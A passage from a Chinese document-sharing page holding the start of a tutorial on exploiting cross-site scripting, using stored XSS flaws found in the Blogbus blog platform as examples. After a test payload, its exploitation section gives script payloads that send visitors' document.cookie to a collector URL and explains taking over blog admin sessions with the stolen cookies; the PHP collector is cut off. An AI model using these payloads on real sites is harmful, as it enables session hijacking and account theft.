- 1、本文档共22页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
跨站脚本攻击实例解析
作者:泉哥
主页:
前言
跨站攻击, 即 Cross Site Script Execution( 通常简写为 XSS ,因为 CSS 与层叠样式表同名, 故改为 XSS)
是指攻击者利用网站程序对用户输入过滤不足, 输入可以显示在页面上对其他用户造成影响的 HTML
代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
很多人对于 XSS 的利用大多停留在弹框框的程度,一些厂商对 XSS 也是不以为然,都认为安全级别
很低,甚至忽略不计。本文旨在讲述关于跨站攻击的利用方式,并结合实例进行分析。
漏洞测试
关于对 XSS 的漏洞测试,这里就以博客大巴为例进行测试,最近我也在上面发现了多处跨站漏洞,
其中两处已公布在 WooY un 网站上,其主要内容如下:
漏洞详情
简要描述:
博客大巴存储型 XSS 漏洞
详细说明:
在“个人信息设置”的“附加信息”一项中,由于对“个人简介”的内容过滤不严,导致可在博客首页实现跨站,而
在下方“添加一段附加信息”中,由于对“信息标题”内容过滤不严,同样可导致跨站的出现。
但我刚又测试了一下,发现官方只修补了其中一个漏洞(个人简介) ,而另一个漏洞得在博客管理后
台才能触发,利用价值不大。与此同时我在对博客模板的测试中,又发现了五处跨站漏洞,估计这些
漏洞其实很早就有人发现了,只是没人公布或者报给 blogbus 后仍未修补。这次报给 WooYun 的主要
目的是让 blogbus 修补此漏洞, 因为我的博客就在上面! ^_^ 其余五处漏洞分别在 “编辑自定义模板”
中,由于对代码模块 head,index,index-post,detail,detail-post 等处的代码过滤不严,导致跨站的发生,
分别向其写入 img src=# onerror=alert(head)/img ,为便于区别,我将提示语句更改为对应的名
称,前三项在首页可触发脚本,后两项需打开文章才可触发,测试结果如图 1、2 所示:
图 1 (在首页触发)
图 2 (打开文章触发)
对于其它网站的测试基本也是大同小异,除了手工测试外,你还可使用其它一些自动扫描工具,比如
Acunetix Web Scanner ,,
漏洞利用
一、窃取 Cookie
对于跨站的攻击方法,使用最多的莫过于 cookie 窃取了,获取 cookie 后直接借助“明小子”工具或
其它可修改 cookie 的浏览器 (如装有 Cookies Edit 插件的 Firefox )将 cookie 修改为获取的 cookie ,这
样即可获得博客的管理权限。
首先,我们在自定义模板的 head 代码模块中写入
scriptdocument.write(img src=http://localhost/test.php?cookie=+document.cookie+ width=0
height=0 border=0 /);/script
或者
scriptdocument.location = http://localhost/test.php?cookie= + document.cookie;/script
这里我把脚本放在本机上, 你可以根据脚本地址来更改上面的 localhost 地址。 以上两个均可达到同等
效果,但就隐蔽性而言,前者的隐蔽性会更强些,读者可自行选择,当然也有其它语句可达到一样的
目的,就看你如何发挥了。接下来我们来编写上面的 test.php 文件,它主要用于获取对方的 cookie ,
其源代码如下:
? php
$ cookie = $_GE
文档评论(0)